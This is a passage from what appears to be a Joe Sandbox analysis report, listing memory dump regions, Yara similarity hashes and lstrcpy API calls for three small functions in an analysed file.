                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 73a5790af25f027d40e0401157aa622a4cea4b3bb278c04448db72c3d05fadec
                                • Instruction ID: 01904ea307e1dde8fd86eaecd23b2c0cd12ae68310c2121a6aa96c626e79f25a
                                • Opcode Fuzzy Hash: 73a5790af25f027d40e0401157aa622a4cea4b3bb278c04448db72c3d05fadec
                                • Instruction Fuzzy Hash: CD31B475A11F02AFDB25DF3AC588956BBE5BF89305705492DA896D7B10DB30F811CB80
                                Function 003B1570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 003B15A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B15D9
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B1611
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B1649
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: a886ff0499b175e5f8312ee9ce9a1e2aade1194c56eb71630a9d18168f8a7555
                                • Instruction ID: 0cce8629334bd8ebbe2245fe6109126a56c4822a0a518d3d11f61dcdc6cc7483
                                • Opcode Fuzzy Hash: a886ff0499b175e5f8312ee9ce9a1e2aade1194c56eb71630a9d18168f8a7555
                                • Instruction Fuzzy Hash: 41210874611B029FDB36DF2AD868A17B7F4BF44704B444A1DA886C7A40DB30E811CBA0
                                Function 00391610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 0039162D
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039164F
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391671
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391693
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 2f0e1f7bbf5a16b3085ab9a2ceb63b5698ab9c9fe71fe9a5558e879f9d0777b6
                                • Instruction ID: fdb6a51a1d243eaf8c7cda645cf9610788089fc3f1524fcfc3857a31251a369e
                                • Opcode Fuzzy Hash: 2f0e1f7bbf5a16b3085ab9a2ceb63b5698ab9c9fe71fe9a5558e879f9d0777b6
                                • Instruction Fuzzy Hash: 43111C74E12B03ABDF259F36D40D927B7F8BF44301709052DA896D7A40EB30E811CB90